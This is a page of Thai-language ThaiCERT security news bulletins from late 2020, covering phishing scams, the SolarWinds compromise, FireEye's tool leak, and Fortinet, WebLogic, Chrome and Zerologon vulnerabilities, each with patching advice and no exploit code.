Clear
Lead Graphic Papers

ข่าวสั้น

ระวังภัย พบการส่งลิงก์ฟิชชิ่งผ่าน LINE หลอกให้ลงทะเบียนรับแก้ว Starbucks อย่าคลิก

ไทยเซิร์ตได้รับรายงานการแพร่กระจายลิงก์ฟิชชิ่งผ่าน LINE และ WhatsApp โดยลักษณะเป็นการส่งข้อความภาษาไทย แจ้งให้เข้าร่วมกิจกรรมเพื่อรับแก้ว Starbucks พร้อมแนบลิงก์สำหรับเข้าร่วมกิจกรรมดังกล่าว อย่างไรก็ตาม ลิงก์ที่ส่งมาไม่ใช่เว็บไซต์ของ Starbucks แต่เป็นเว็บไซต์ปลอมที่แอบอ้างชื่อและโลโก้ หากคลิกเล่นกิจกรรมในหน้าเว็บไซต์ดังกล่าวไปจนถึงขั้นตอนสุดท้ายจะพบการแจ้งให้ส่งข้อความผ่าน WhatsApp หรือ LINE เพื่อเผยแพร่ลิงก์ของเว็บไซต์ฟิชชิ่งให้บุคคลอื่นต่อไป

การส่งลิงก์ฟิชชิ่งเพื่อหลอกให้เข้าเว็บไซต์กิจกรรมชิงรางวัลนั้นเป็นหนึ่งในรูปแบบการโจมตีลักษณะสแกม (scam) ซึ่งในช่วงหลังการโจมตีในลักษณะนี้พบมากขึ้นในช่องทางโปรแกรมแช็ทหรือ SMS เนื่องจากการส่งลิงก์ฟิชชิ่งผ่านช่องทางเหล่านี้มักไม่ได้มีกระบวนการตรวจสอบเว็บไซต์ปลอมที่ทำงานได้ดีเท่าระบบคัดกรองอีเมล อีกทั้งการเปิดลิงก์ฟิชชิ่งผ่านช่องทางดังกล่าวมักเกิดขึ้นบนโทรศัพท์มือถือซึ่งเบราว์เซอร์หรือตัวผู้ใช้งานเองอาจไม่สามารถสังเกตความผิดปกติของ URL ได้ดีเท่าการเปิดบนคอมพิวเตอร์

ถึงแม้ระดับความเสียหายของการโจมตีแบบสแกมอาจยังไม่มากเท่าการโจมตีแบบฟิชชิ่งหรือมัลแวร์ แต่ก็มีความเป็นไปได้ที่ตัวเว็บไซต์สแกมอาจถูกเปลี่ยนเป็นหน้าฟิชชิ่งหรือใช้เพื่อแพร่กระจายมัลแวร์ในภายหลังได้ ผู้ใช้ควรตระหนักและระมัดระวังการคลิกลิงก์หรือส่งต่อข้อความในลักษณะที่น่าสงสัย เช่น ส่งข้อความผ่านบุคคลอื่น หรือลิงก์สำหรับเข้าร่วมกิจกรรมไม่ใช่เว็บไซต์จริงของบริการ เพราะอาจตกเป็นเหยื่อของการโจมตีได้

วันที่: 2020-12-18 | ที่มา: - | Share on Facebook Share on Twitter Share on Google+
แจ้งเตือน SolarWinds ถูกแฮกฝังโค้ดมัลแวร์ในผลิตภัณฑ์ Orion มีการโจมตีแล้ว ควรรีบอัปเดต

เมื่อวันที่ 13 ธันวาคม 2563 มีรายงานว่าหน่วยงานภาครัฐหลายแห่งในประเทศสหรัฐอเมริกาถูกเจาะระบบโดยกลุ่มผู้โจมตีที่ได้รับการสนับสนุนระดับประเทศ (state-sponsored attack) ในรายงานระบุว่าหน่วยงานเหล่านั้นถูกโจมตีผ่านระบบ SolarWinds ซึ่งเป็นซอฟต์แวร์บริหารจัดการและตรวจสอบสถานะของอุปกรณ์ในเครือข่าย เบื้องต้นทาง SolarWinds ได้ออกแถลงการณ์ว่าระบบถูกเข้าถึงโดยไม่ได้รับอนุญาต และซอฟต์แวร์ที่เผยแพร่ในระหว่างช่วงเดือนมีนาคมถึงมิถุนายนปี 2563 นั้นถูกดัดแปลงเพื่อฝังโค้ดอันตราย (supply chain attack) โดยซอฟต์แวร์ที่ได้รับผลกระทบคือ SolarWinds Orion Platform เวอร์ชัน 2019.4 HF 5, 2020.2 และ 2020.2 HF 1

ทาง SolarWinds ได้แจ้งเตือนให้ผู้ใช้งานรีบอัปเดตซอฟต์แวร์ Orion Platform สำหรับผู้ใช้งานเวอร์ชัน 2019.4 HF 5 หรือต่ำกว่าให้อัปเดตเป็น 2019.4 HF 6 และสำหรับผู้ใช้งานเวอร์ชัน 2020.2 หรือ 2020.2 HF 1 ให้อัปเดตเป็นเวอร์ชัน 2020.2.1 HF 1 โดยเร็วที่สุดเพื่อลดความเสี่ยง รวมถึงจะออกอัปเดตเวอร์ชัน 2020.2.1 HF 2 ในวันที่ 15 ธันวาคม 2563 เพื่อปรับปรุงความมั่นคงปลอดภัยเพิ่มเติมด้วย (อ้างอิง https://www.solarwinds.com/securityadvisory)

ทีมวิจัยด้านความมั่นคงปลอดภัยจาก Microsoft ให้ข้อมูลเพิ่มเติมเกี่ยวกับการโจมตี โดยได้เรียกเหตุการณ์นี้ว่า Solorigate รูปแบบการโจมตีเป็นการแทรกโค้ดในโปรแกรม SolarWinds Orion Platform เพื่อให้โหลดไฟล์ DLL ของมัลแวร์ขึ้นมาทำงาน โดยมัลแวร์ดังกล่าวจะทำหน้าที่เป็น backdoor ติดต่อและส่งข้อมูลกลับไปยังเครื่องสั่งการและควบคุม (command and control หรือ C2) โดยทาง Microsoft ได้เผยแพร่รายการ IoC รวมถึงออกอัปเดตฐานข้อมูลของ Windows Defender เพื่อตรวจจับไฟล์มัลแวร์ดังกล่าวแล้ว (อ้างอิง https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks)

ทาง FireEye ได้เผยแพร่บทวิเคราะห์การโจมตีโดยละเอียด ทั้งภาพรวมการโจมตี บทวิเคราะห์มัลแวร์ และข้อมูล IoC ของไฟล์และโดเมนที่เกี่ยวข้อง (อ้างอิง https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html) ทั้งนี้ มีรายงานว่ากลุ่มผู้ที่โจมตี SolarWinds น่าจะเป็นกลุ่มเดียวกับที่เจาะระบบของบริษัท FireEye และขโมยเครื่องมือสำหรับใช้เจาะระบบออกมา (ข่าวเก่า https://www.thaicert.or.th/newsbite/2020-12-09-01.html)

ทีมไทยเซิร์ตอยู่ระหว่างการรวบรวมข้อมูลและประสานกับหน่วยงานที่เกี่ยวข้อง เนื่องจากพบว่ามีการใช้งานผลิตภัณฑ์ SolarWinds Orion Platform ในประเทศไทยด้วย ทั้งนี้ หน่วยงานที่มีการใช้งาน SolarWinds โปรดติดตามข่าวสาร อัปเดตแพตช์ และตรวจสอบข้อมูล IoC เพื่อประเมินสถานการณ์การโจมตี

วันที่: 2020-12-14 | ที่มา: SANS, Washington Post | Share on Facebook Share on Twitter Share on Google+
Microsoft ออกแพตช์ความมั่นคงปลอดภัยประจำเดือนธันวาคม 2563 ผู้ใช้งานควรพิจารณาอัปเดต

เมื่อวันที่ 9 ธันวาคม 2563 บริษัท Microsoft ได้ออกแพตช์ความมั่นคงปลอดภัยประจำเดือน โดยมีช่องโหว่ที่ถูกแก้ไขทั้งหมด 58 จุด เป็นช่องโหว่ระดับวิกฤต (Critical) จำนวน 9 จุด และช่องโหว่สำคัญ (Important) จำนวน 48 จุด อย่างไรก็ตาม ไม่พบรายงานการโจมตีหรือมีการเผยแพร่ช่องโหว่ใด ๆ ในรอบนี้

ช่องโหว่ที่น่าสนใจมีด้วยกัน 3 ช่องโหว่ ได้แก่

  1. ช่องโหว่หมายเลข CVE-2020-17095 เป็นช่องโหว่ประเภท Remote Code Execution (RCE) ใน Hyper-V ส่งผลกระทบให้ผู้ไม่หวังดีสามารถรันโปรแกรมอันตรายใน VM เพื่อเข้าควบคุมในส่วนโฮสต์ได้
  2. ช่องโหว่หมายเลข CVE-2020-17096 เป็นช่องโหว่ประเภท RCE ใน Windows NTFS อนุญาตให้ผู้ไม่หวังดีสามารถรันคำสั่งอันตรายจากระยะไกลผ่านโพรโทคอล SMBv2 เพื่อยกระดับสิทธิ์ได้
  3. ช่องโหว่หมายเลข CVE-2020-17099 เป็นช่องโหว่ใน Windows Lock Screen ทำให้ผู้ไม่หวังดีสามารถรันคำสั่งอันตรายบนเครื่องที่ยังไม่ได้ปลดล๊อกหน้าจอ

เนื่องจากแพตช์ประจำเดือนมีจุดประสงค์เพื่อแก้ไขปัญหาช่องโหว่ด้านความมั่นคงปลอดภัย ผู้ใช้งานควรอัปเดตแพตช์ให้เป็นเวอร์ชันล่าสุดเพื่อป้องกันและลดความเสี่ยงจากการถูกโจมตีที่อาจเกิดขึ้น

วันที่: 2020-12-09 | ที่มา: Bleeping Computer, Microsoft | Share on Facebook Share on Twitter Share on Google+
แจ้งเตือน เครื่องมือทดสอบเจาะระบบของ FireEye รั่วไหล ทางบริษัทเผยแพร่ข้อมูลตั้งค่าเพื่อลดความเสี่ยงแล้ว ผู้ดูแลระบบควรรีบอัปเดต

เมื่อวันที่ 9 ธันวาคม 2563 บริษัทด้านความมั่นคงปลอดภัยทางไซเบอร์ FireEye ได้ออกมาเปิดเผยว่าทางบริษัทถูกผู้ไม่หวังดีโจมตีและเข้าถึงข้อมูลภายใน ทำให้ข้อมูลทางด้านเทคนิคและเครื่องมือสำหรับทดสอบเจาะระบบความปลอดภัยให้กับลูกค้ารั่วไหล FireEye ให้ข้อมูลเพิ่มเติมว่าเครื่องมือที่หลุดไปนั้นไม่ได้ใช้ช่องโหว่ 0-day แต่เป็นช่องโหว่เก่าที่เป็นที่รู้จักจำนวน 16 รายการในผลิตภัณฑ์ต่าง ๆ เช่น Pulse Secure SSL VPN, Microsoft Active Directory บางช่องโหว่ส่งผลกระทบรุนแรงให้ผู้ไม่หวังดีควบคุมระบบได้

เพื่อลดผลกระทบ FireEye ได้เผยแพร่ rule สำหรับตั้งค่าในอุปกรณ์รักษาความปลอดภัยและข้อมูลช่องโหว่ที่เกี่ยวข้อง เพื่อรับมือภัยคุกคามที่อาจเกิดขึ้นจากการนำเครื่องมือและข้อมูลดังกล่าวมาโจมตี รวมถึงได้อัปเดตการตรวจจับในผลิตภัณฑ์ของตัวเอง และได้แจ้งข้อมูลไปยังผู้ผลิตอุปกรณ์ด้านความมั่นคงปลอดภัยรายอื่นแล้ว

สำหรับผู้ดูแลระบบที่สนใจสามารถศึกษารายละเอียดช่องโหว่ที่เครื่องมือใช้โจมตีและ rule สำหรับตรวจจับที่ทาง Fireeye ซึ่งเผยแพร่อยู่ในรูปแบบต่าง ๆ (Snort, Yara, ClamAV, OpenIOC) ได้ที่ https://github.com/fireeye/red_team_tool_countermeasures

วันที่: 2020-12-09 | ที่มา: FireEye, Twitter, Github | Share on Facebook Share on Twitter Share on Google+
แจ้งเตือน พบการโจมตีช่องโหว่ใน Fortinet VPN อาจถูกขโมยบัญชีและรหัสผ่าน หน่วยงานในไทยกระทบด้วย ควรรีบอัปเดตและเปลี่ยนรหัสผ่าน

เมื่อวันที่ 19 พฤศจิกายน 2563 มีรายงานการเผยแพร่ IP ของอุปกรณ์ Fortinet VPN ที่มีช่องโหว่ CVE-2018-13379 จำนวนประมาณ 49,000 เครื่อง โดยเป็นอุปกรณ์ในไทยกว่า 900 เครื่อง พร้อมตัวอย่างโค้ดโจมตีช่องโหว่ที่สามารถใช้ขโมยบัญชีและรหัสผ่านจากตัวอุปกรณ์ได้

ช่องโหว่ CVE-2018-13379 เป็นช่องโหว่ประเภท path traversal ในเว็บพอร์ทัลของอุปกรณ์ Fortinet VPN ผู้ประสงค์ร้ายสามารถส่ง HTTP request อันตรายเพื่อเข้าถึงไฟล์ระบบของอุปกรณ์ รวมถึงข้อมูลการตั้งค่า เช่น ชื่อบัญชีผู้ใช้และรหัสผ่านสำหรับบริหารจัดการอุปกรณ์ Fortinet VPN ตัวช่องโหว่มีผลกระทบกับอุปกรณ์ที่ใช้ FortiOS เวอร์ชัน 6.0.0-6.0.4, 5.6.3-5.6.7 และ 5.4.6-5.4.12

ต่อมา เมื่อวันที่ 25 พฤศจิกายน 2563 มีรายงานการเผยแพร่ชื่อบัญชีและรหัสผ่านสำหรับเข้าถึงอุปกรณ์ Fortinet VPN ที่ยังไม่ได้รับการแก้ไขช่องโหว่ ซึ่งข้อมูลดังกล่าวมีความเสี่ยงที่อาจทำให้หน่วยงานที่ยังคงใช้งานอุปกรณ์เหล่านั้นถูกเจาะระบบ ข้อมูลรั่วไหล ติดมัลแวร์เรียกค่าไถ่ หรือเกิดความเสียหายอื่น ๆ ต่อระบบเครือข่ายของหน่วยงานได้

ทั้งนี้ ไทยเซิร์ตอยู่ระหว่างการประสานไปยังหน่วยงานที่ได้ผลกระทบเพื่อขอให้ตรวจสอบและแก้ไขปัญหา โดยผู้ดูแลระบบที่ใช้งานอุปกรณ์ที่มีช่องโหว่ควรอัปเดตเฟิร์มแวร์ให้เป็นเวอร์ชันล่าสุดเพื่อลดความเสี่ยง รวมถึงเปลี่ยนรหัสผ่านของอุปกรณ์เนื่องจากอาจมีความเสี่ยงรหัสผ่านรั่วไหล ทั้งนี้ หน่วยงานที่ใช้งานอุปกรณ์ Fortinet VPN สามารถศึกษาข้อมูลเพิ่มเติมเรื่องแพตช์และการตั้งค่าระบบความมั่นคงปลอดภัยได้จากข้อแนะนำของทาง Fortinet (https://www.fortinet.com/blog/business-and-technology/atp-29-targets-ssl-vpn-flaws)

วันที่: 2020-11-23 | ที่มา: Bleeping Computer, National Vulnerability Database | Share on Facebook Share on Twitter Share on Google+
Microsoft ออกแพตช์ความมั่นคงปลอดภัยประจำเดือนพฤศจิกายน 2563 แก้ไขช่องโหว่ที่ถูกใช้โจมตีแล้ว ควรรีบอัปเดต

เมื่อวันที่ 11 พฤศจิกายน 2563 บริษัท Microsoft ได้ออกแพตช์ความมั่นคงปลอดภัยประจำเดือน โดยมีช่องโหว่ที่ถูกแก้ไขทั้งหมด 112 จุด เป็นช่องโหว่ระดับวิกฤต (Critical) จำนวน 17 จุด และช่องโหว่สำคัญ (Important) จำนวน 93 จุด ในแพตช์รอบนี้มีการแก้ไขช่องโหว่จำนวน 1 จุดที่มีรายงานว่าถูกใช้โจมตีแล้ว

ช่องโหว่ที่มีรายงานการโจมตีแล้วคือช่องโหว่รหัส CVE-2020-17087 ซึ่งเป็นช่องโหว่ระดับวิกฤตประเภท Remote Code Execution (RCE) ใน Windows Kernel Cryptography Driver (cng.sys) ระดับความรุนแรง CVSS 7.8 ผลกระทบจากช่องโหว่เปิดโอกาสให้ผู้ไม่หวังดีสามารถควบคุมเครื่องของเหยื่อได้จากระยะไกล ทั้งนี้ถึงแม้ในรายงานจะระบุว่าช่องโหว่นี้ถูกใช้ในการโจมตีแบบเจาะจงเป้าหมาย แต่ยังไม่มีการเปิดเผยรายละเอียดทางเทคนิคของช่องโหว่ดังกล่าว

เนื่องจากแพตช์ประจำเดือนมีจุดประสงค์เพื่อแก้ไขปัญหาช่องโหว่ด้านความมั่นคงปลอดภัย ผู้ใช้ทั่วไปและผู้ดูแลระบบควรพิจารณาอัปเดตแพตช์เพื่อลดความเสี่ยงจากการถูกโจมตี

วันที่: 2020-11-11 | ที่มา: ZDNet, Microsoft | Share on Facebook Share on Twitter Share on Google+
แจ้งเตือน พบช่องโหว่ร้ายแรงในปลั๊กอิน Ultimate Member ของ WordPress อาจถูกแฮกเว็บไซต์ได้ ควรรีบอัปเดต

เมื่อวันที่ 9 พฤศจิกายน 2563 ทีม Wordfence ผู้ให้บริการด้านความมั่นคงปลอดภัยสำหรับ WordPress ได้รายงานช่องโหว่ระดับวิกฤต (Critical) จำนวน 3 จุดในปลั๊กอิน Ultimate Member ซึ่งเป็นปลั๊กอินที่ใช้สำหรับบริหารจัดการสิทธิของสมาชิกในเว็บไซต์ โดยมียอดติดตั้งและใช้งานในเว็บไซต์กว่า 100,000 แห่ง

จากรายงาน ทั้ง 3 ช่องโหว่เป็นประเภท Privilege Escalation ที่ส่งผลให้ผู้ไม่หวังดีสามารถโจมตีเพื่อได้สิทธิของผู้ดูแลระบบ WordPress หากโจมตีสำเร็จจะสามารถแก้ไขหน้าเว็บไซต์หรืออัปโหลดไฟล์อันตรายขึ้นมาบนเว็บไซต์ได้ ตัวช่องโหว่มีระดับความรุนแรง CVSS ที่ 9.9 และ 10 คะแนน มีผลกระทบกับปลั๊กอิน Ultimate Member เวอร์ชัน 2.1.11 หรือเวอร์ชันที่ต่ำกว่า

ทางผู้พัฒนาปลั๊กอิน Ultimate Member ได้ออกอัปเดตเวอร์ชัน 2.1.12 เพื่อแก้ไขช่องโหว่แล้ว เพื่อหลีกเลี่ยงและป้องกันความเสี่ยงที่อาจเกิดขึ้น ผู้ดูแลเว็บไซต์ควรรีบอัปเดตปลั๊กอินให้เป็นเวอร์ชันปัจจุบันโดยด่วน

วันที่: 2020-11-10 | ที่มา: Bleeping Computer, Wordfence | Share on Facebook Share on Twitter Share on Google+
ข้อมูลผู้ใช้ Wongnai พร้อมรหัสผ่านแบบ MD5 รั่วไหลเกือบ 4 ล้านบัญชี เช็คได้จาก Have I Been Pwned

Wongnai เป็นบริการค้นหาร้านอาหาร ที่พัก สถานที่ท่องเที่ยว ฯลฯ ที่ได้รับความนิยมในประเทศไทย เมื่อวันที่ 30 ตุลาคม 2563 ทาง Wongnai ได้ออกแถลงการณ์แจ้งเตือนการโจมตีทางไซเบอร์ที่ส่งผลกระทบกับข้อมูลของผู้ใช้บริการ (อ้างอิง https://www.wongnai.com/pages/wongnai-security-incident) โดยมีรายงานว่าข้อมูลดังกล่าวได้ถูกนำไปประกาศขายในเว็บไซต์ใต้ดิน

เมื่อวันที่ 5 พฤศจิกายน 2563 เว็บไซต์ Have I Been Pwned? รายงานว่าได้รับข้อมูลผู้ใช้งานที่ได้รับผลกระทบจากเหตุการณ์ข้อมูลรั่วไหล จำนวนกว่า 4 ล้านรายการ จากทาง Wongnai จุดประสงค์เพื่อให้ผู้ใช้งานได้ตรวจสอบว่าตนเองได้รับผลกระทบจากเหตุการณ์ดังกล่าวหรือไม่

Have I Been Pwned? เป็นเว็บไซต์ที่มีจุดประสงค์เพื่อรวบรวมฐานข้อมูลกลางของชุดข้อมูลที่รั่วไหลออกมาจากแหล่งต่าง ๆ เพื่อให้ผู้ที่สงสัยว่าได้รับผลกระทบหรือไม่นั้นสามารถตรวจสอบข้อมูลได้ ตัวเว็บไซต์ดำเนินการโดยนักวิจัยด้านความมั่นคงปลอดภัยชื่อ Troy Hunt (https://haveibeenpwned.com/About) ช่องทางของการได้มาซึ่งชุดข้อมูลรั่วไหลนั้นมีทั้งการซื้อข้อมูลจากตลาดมืด และการได้รับบริจาคข้อมูลโดยหน่วยงานที่ถูกโจมตี

อย่างไรก็ตาม จากแถลงการณ์ของทาง Wongnai ระบุว่ารหัสผ่านที่รั่วไหลนั้นได้รับการเข้ารหัส แต่จากข้อมูลในรายงานหลายแห่ง รวมถึงจากประกาศของ Have I Been Pwned? ระบุว่ารหัสผ่านนั้นถูกเก็บด้วยค่าแฮชแบบ MD5 ซึ่งในทางเทคนิคแล้วอาจมีความเสี่ยงที่ผู้ประสงค์ร้ายจะสามารถหารหัสผ่านที่ตรงกับฐานข้อมูลที่หลุดออกมาได้ หากผู้ใช้งาน Wongnai ใช้รหัสผ่านเดียวกันนี้กับบริการอื่น ก็มีความเสี่ยงที่อาจจะถูกเข้าถึงบัญชีของบริการอื่นได้ด้วย

ข้อแนะนำ

  • ผู้ที่ใช้งาน Wongnai อาจพิจารณาตรวจสอบว่าบัญชีที่ใช้งานอยู่นั้นได้รับผลกระทบหรือไม่ โดยตรวจสอบได้จากเว็บไซต์ Have I Been Pwned? (https://haveibeenpwned.com/) ทั้งนี้ การตรวจสอบสามารถทำได้โดยใส่อีเมลที่สมัครใช้บริการ ควรพิจารณาก่อนกรอกรหัสผ่านที่ใช้งานจริง
  • ผู้ที่ใช้งาน Wongnai ไม่ว่าจะได้รับผลกระทบจากเหตุการณ์ดังกล่าวหรือไม่ ควรเปลี่ยนรหัสผ่านในทันที หากใช้รหัสผ่านดังกล่าวกับบริการอื่นควรเปลี่ยนรหัสผ่านของบริการอื่นด้วย โดยควรตั้งรหัสผ่านของแต่ละบริการไม่ให้ซ้ำกัน
  • ควรพิจารณาใช้โปรแกรมบริการจัดการรหัสผ่าน (password manager) เพื่อใช้จัดเก็บรหัสผ่านของแต่ละบริการแยกจากกัน และเปิดใช้งานการยืนยันตัวตนแบบหลายปัจจัย (multi factor authentication) ในทุกบริการที่สามารถทำได้

วันที่: 2020-11-05 | ที่มา: Have I Been Pwned?, Bleeping Computer | Share on Facebook Share on Twitter Share on Google+
CERT/CC เสนอแนวทางการตั้งชื่อช่องโหว่ ใช้ชื่อที่เป็นกลางและจำได้ง่าย

ที่ผ่านมา เมื่อมีการค้นพบช่องโหว่ นอกจากจะมีการตั้งรหัส CVE (Common Vulnerabilities and Exposures) ให้กับช่องโหว่แล้ว ก็มักมีการตั้งชื่อให้กับช่องโหว่นั้นด้วย จุดประสงค์ของการตั้งชื่อช่องโหว่นั้นมีได้ทั้งเพื่อการตลาดหรือเพื่อการสื่อสารให้ง่ายต่อการจดจำ อย่างไรก็ตาม ที่ผ่านมามีหลายช่องโหว่ที่ถูกตั้งชื่อให้ดูร้ายแรงเกินความเป็นจริง หรือเป็นชื่อที่ไม่สอดคล้องกับสิ่งที่เกิดขึ้น ทาง CERT/CC ซึ่งเป็นหน่วยงานหลักของ CERT จึงได้เสนอแนวทางการตั้งชื่อช่องโหว่ที่เป็นกลางและจำได้ง่าย

ทาง CERT/CC สนับสนุนการตั้งชื่อให้กับช่องโหว่ โดยให้เหตุผลว่าการจดจำและการนำเสนอข้อมูลนั้นทำได้ง่ายกว่าการเรียกเป็นรหัส CVE ซึ่งเป็นเหตุผลเดียวกับการใช้ชื่อโดเมนแทนที่จะเป็นไอพี หรือการเรียกชื่อเมืองแทนที่จะใช้เป็นพิกัดทางภูมิศาสตร์ ทั้งนี้ ทาง CERT/CC ได้เสนอแนวทางการตั้งชื่อช่องโหว่โดยใช้คำที่ไม่ก่อให้เกิดความตื่นตระหนก รวมทั้งแนวทางการจับคู่ชื่อเรียกกับชุดของช่องโหว่ด้วย พร้อมทั้งได้เปิดบัญชี Twitter ชื่อ @vulnonym (https://twitter.com/vulnonym) เพื่อใช้เป็น bot สุ่มตั้งชื่อเรียกให้กับ CVE โดยอัตโนมัติ

ตัวอย่างชื่อเรียกของช่องโหว่ที่ถูกสุ่มตั้งขึ้นมานั้นจะเป็นการนำคำสรรพนามมาจับคู่กับคำนาม (ใกล้เคียงกับการตั้งโค้ดเนมของ Ubuntu) ตัวอย่างเช่น ช่องโหว่รหัส CVE-2020-9875 ถูกตั้งชื่อว่า Scary Seine (https://twitter.com/vulnonym/status/1319403949179441155) ทั้งนี้ แนวทางการตั้งชื่อช่องโหว่ด้วยวิธีดังกล่าวยังเป็นไอเดียทดสอบ ผู้ที่สนใจสามารถศึกษารายละเอียดเพิ่มเติมได้จากที่มา

วันที่: 2020-11-03 | ที่มา: CERT/CC, The Register | Share on Facebook Share on Twitter Share on Google+
แจ้งเตือน พบการโจมตีช่องโหว่ใน Google Chrome กระทบทั้งเวอร์ชัน Desktop และ Android ควรรีบอัปเดต

เมื่อวันที่ 2 พฤศจิกายน 2563 บริษัท Google ได้ออกอัปเดต Google Chrome เพื่อแก้ไขปัญหาด้านความมั่นคงปลอดภัย โดยทาง Google ระบุว่ามีอย่างน้อย 2 ช่องโหว่ที่ถูกใช้ในการโจมตีจริงแล้ว แต่ยังไม่ได้ระบุรายละเอียดหรือขอบเขตของการโจมตีดังกล่าว

ช่องโหว่แรกที่ถูกใช้โจมตีเป็นช่องโหว่ใน Google Chrome เวอร์ชัน desktop โดยเป็นช่องโหว่ประเภท remote code execution (RCE) ที่ส่งผลให้ผู้ไม่หวังดีสามารถสั่งประมวลผลโค้ดอันตรายเพื่อควบคุมเครื่องของเหยื่อได้จากระยะไกล ช่องโหว่นี้มีหมายเลข CVE-2020-16009 มีผลกระทบกับ Google Chrome ทั้งบนระบบปฏิบัติการ Windows, Mac และ Linux

ช่องโหว่ถัดมามีผลกระทบกับ Google Chrome เวอร์ชัน Android โดยเป็นช่องโหว่ประเภท heap overflow ทำให้สามารถรันคำสั่งนอก sandbox ได้ ช่องโหว่นี้มีหมายเลข CVE-2020-16010

ทาง Google ระบุว่าจะปล่อยอัปเดต Google Chrome เวอร์ชัน 86.0.4240.183 สำหรับผู้ใช้งานบน desktop และเวอร์ชัน 86.0.4240.185 สำหรับผู้ใช้งานบน Android ในเร็ว ๆ นี้ ผู้ใช้งานควรติดตามข่าวสารและอัปเดตโปรแกรมให้เป็นเวอร์ชันล่าสุดเพื่อลดความเสี่ยง

วันที่: 2020-11-03 | ที่มา: Bleeping Computer, Google, Google | Share on Facebook Share on Twitter Share on Google+
แจ้งเตือน พบการโจมตีช่องโหว่ใน Oracle WebLogic อาจถูกแฮกยึดเซิร์ฟเวอร์ได้ ควรรีบอัปเดต

เมื่อวันที่ 29 ตุลาคม 2563 นักวิจัยจากสถาบัน SANS ได้รายงานปริมาณทราฟฟิกการโจมตีเซิร์ฟเวอร์ที่ใช้งาน Oracle WebLogic เพิ่มสูงขึ้นอย่างมีนัยสำคัญ โดยการโจมตีนี้เจาะจงช่องโหว่ CVE-2020-14882 ซึ่งเป็นช่องโหว่ระดับวิกฤต (Critical) ประเภท Remote Code Execution (RCE) ใน Oracle WebLogic เวอร์ชัน 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 และ 14.1.1.0 ส่งผลให้ผู้ไม่หวังดีสามารถแฮกควบคุมเครื่องได้จากระยะไกล

การโจมตีช่องโหว่ CVE-2020-14882 นั้นไม่ซับซ้อน ผู้ไม่หวังดีสามารถส่งรีเควสต์ HTTP GET ไปยังเซิร์ฟเวอร์ Oracle WebLogic ได้โดยไม่ต้องยืนยันตัวตน ซึ่งหากโจมตีสำเร็จจะสามารถสั่งรันโค้ดอันตรายบนเครื่องเซิร์ฟเวอร์ได้ ทำให้ช่องโหว่นี้มีระดับความรุนแรง CVSS 9.8 เต็ม 10 รายละเอียดของช่องโหว่สามารถศึกษาเพิ่มเติมได้จาก CVE Base (https://www.cvebase.com/cve/2020/14882) ตัวอย่าง log การโจมตีสามารถดูได้จาก SANS (https://isc.sans.edu/diary/26734)

ทั้งนี้ ช่องโหว่ดังกล่าว ทาง Oracle ได้ออกแพตช์แก้ไขไปตั้งแต่วันที่ 20 ตุลาคม 2563 แล้ว เพื่อป้องกันและลดความเสี่ยง ผู้ดูแลระบบควรรีบอัปเดตแพตช์โดยด่วน

วันที่: 2020-10-30 | ที่มา: Bleeping Computer, The Register | Share on Facebook Share on Twitter Share on Google+
แจ้งเตือน พบการโจมตีช่องโหว่ Zerologon (CVE-2020-1472) ควรรีบแพตช์และตรวจสอบการตั้งค่าเซิร์ฟเวอร์เพื่อลดความเสี่ยง

เมื่อวันที่ 29 ตุลาคม 2563 บริษัท Microsoft ได้แจ้งเตือนการโจมตีช่องโหว่ Zerologon (CVE-2020-1472) ซึ่งเป็นช่องโหว่ใน Netlogon Remote Protocol ที่ใช้งานร่วมกับระบบ Active Directory ตัวช่องโหว่ส่งผลให้ผู้ไม่หวังดีสามารถแอบอ้างสิทธิของบัญชีในโดเมนเพื่อยึดเครื่องเซิร์ฟเวอร์ได้ แพตช์สำหรับแก้ไขช่องโหว่ดังกล่าวถูกปล่อยให้อัปเดตตั้งแต่เดือนสิงหาคม 2563 (ข่าวเก่า https://www.thaicert.or.th/newsbite/2020-09-15-01.html) โค้ดสำหรับทดสอบช่องโหว่ได้ถูกเผยแพร่สู่สาธารณะแล้ว

นอกจากรายงานการโจมตีแล้ว ทาง Microsoft ยังได้ปรับปรุงข้อแนะนำการตั้งค่าเซิร์ฟเวอร์เพื่อลดความเสี่ยงจากช่องโหว่ Zerologon ด้วย โดยสามารถแบ่งขั้นตอนการดำเนินงานออกได้เป็น 4 ช่วง ดังนี้

  1. UPDATE คือการติดตั้งแพตช์ความมั่นคงปลอดภัยประจำเดือนสิงหาคม 2563 หรือใหม่กว่าให้กับเครื่องที่ทำหน้าที่เป็น Domain Controller
  2. FIND คือการตรวจสอบ log event ID 5829 ใน Domain Controller เพื่อค้นหาเครื่องในเครือข่ายที่ยังไม่ได้เชื่อมต่อ Netlogon แบบ secure channel
  3. ADDRESS คือการตรวจสอบ log event ID 5827 และ 5828 ใน Domain Controller เพื่อค้นหาและแก้ไขปัญหาเครื่องในเครือข่ายที่ถูกปฏิเสธการล็อกอิน
  4. ENABLE คือการตั้งค่า Netlogon ให้ล็อกอินแบบ secure channel หรือยอมอนุญาตให้ล็อกอินผ่านช่องทางที่มีช่องโหว่ได้

ทั้งนี้ ทาง Microsoft ได้ให้ข้อมูลเพิ่มเติมว่า จะเริ่มเปิดใช้การตั้งค่า Domain Controller ในแบบ enforcement mode ในแพตช์เดือนกุมภาพันธ์ 2564 ซึ่งอาจมีผลกระทบกับระบบที่ยังไม่รองรับ ผู้ดูแลระบบควรตรวจสอบข้อมูลและรายละเอียดการตั้งค่าเพิ่มเติมจากบทความข้อแนะนำของทาง Microsoft (https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc)

วันที่: 2020-10-30 | ที่มา: Microsoft, Bleeping Computer | Share on Facebook Share on Twitter Share on Google+
แบบนี้ก็ทำได้ มีผู้จดทะเบียนชื่อบริษัทเป็นโค้ด HTML ที่มีสคริปต์ Cross-Site Scripting

